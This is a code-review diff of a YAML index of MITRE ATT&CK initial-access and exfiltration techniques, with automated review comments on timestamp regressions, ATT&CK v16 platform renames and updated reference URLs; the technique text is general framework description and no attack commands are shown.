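Review bot: the `modified` timestamp for T1529 moves backwards, from 2023-05-09T14:00:00.188Z to 2023-03-22T20:45:22.531Z, and T1133 (to 2023-03-30) and T1195.003 (to 2022-04-28) show the same regression further down. That pattern suggests the old values were a collection-level release timestamp rather than the object's own `modified`, which would make the new values correct, but it should be stated in the commit message so nobody later "fixes" it back. Minor: the description keeps `reload` split onto its own line (`(e.g. reload` / `)`), like `del` / `rm` in T1485 above, where inline code markup was stripped; that is pre-existing context, but worth a generator fix.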
@@ -59077,13 +60009,12 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests: []
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -59161,7 +60092,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -59211,11 +60141,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59254,10 +60183,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
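Review bot: Office 365 and Google Workspace are replaced by Identity Provider and Office Suite in T1566.002's platform list (version 2.6 to 2.7), and T1078.001 below gets the same substitution plus the removal of Azure AD. If the per-platform index CSVs are derived from x_mitre_platforms, the generator needs to emit office-suite and identity-provider indexes and the stale platform indexes should be retired in the same change; nothing changes for these two techniques today because their atomic_tests lists are empty.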
@@ -59274,7 +60203,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
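Review bot: pinning the ACSC SPF guidance to a dated web.archive.org snapshot is the right call when the cyber.gov.au path no longer resolves; the identical replacement is applied to the T1566.001 copy of the same reference below, so the two entries stay consistent.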
@@ -59313,12 +60242,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59380,7 +60308,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -59397,7 +60325,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -59427,7 +60354,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59441,7 +60368,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -59504,12 +60430,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59584,7 +60509,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59598,19 +60523,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -59636,7 +60560,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -59691,7 +60615,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -59754,11 +60677,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59773,6 +60695,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -59781,18 +60704,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
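Review bot: the platform list for T1078.001 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, with `x_mitre_version` bumped from '1.3' to '1.4'; the same rename recurs for T1199, T1566, T1078, T1566.004, T1189, T1078.004, T1567, T1567.004, T1048 and T1537 later in this diff. This matches the ATT&CK v16 platform consolidation, so it is expected, but any per-platform index that is keyed on the old platform strings will need to be regenerated in the same change, otherwise techniques that previously appeared under the Office 365 or Google Workspace platform disappear from those indexes without a corresponding entry under the new names.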
@@ -59824,14 +60747,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -59842,6 +60762,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -59850,22 +60775,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -59890,36 +60811,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
@@ -59948,9 +60852,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -59968,7 +60872,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
@@ -60006,11 +60914,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -60027,7 +60934,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -60037,7 +60943,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -60046,19 +60952,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -60106,11 +61010,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -60130,10 +61035,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -60166,7 +61069,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -60205,7 +61107,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
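Review bot: `modified` for T1195.002 moves backwards, from '2022-05-24T14:00:00.188Z' to '2022-04-28T16:04:36.636Z', and the same regression appears later for T1200, T1029, T1011.001, T1048.001, T1048.002, T1041, T1052.001, T1030, T1052, T1048.003, T1055.011 and T1205.002. The removed values all share the `T14:00:00.188Z` time component, which looks like a release-wide bulk stamp, while the added values are per-object timestamps, so this is probably the generator now reading the object's own `modified` rather than the bundle date. That should be stated in the commit message, since a tool that diffs `modified` to detect updated techniques will treat these as no-ops or as rollbacks.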
@@ -60220,7 +61122,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -60300,11 +61201,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60360,11 +61260,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -60425,8 +61324,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -60454,13 +61353,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60500,8 +61398,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -60509,13 +61409,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -60546,9 +61446,6 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -60670,7 +61567,7 @@ initial-access:
'
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -60737,11 +61634,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60793,15 +61689,14 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60825,10 +61720,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -60847,13 +61741,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -60892,9 +61785,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
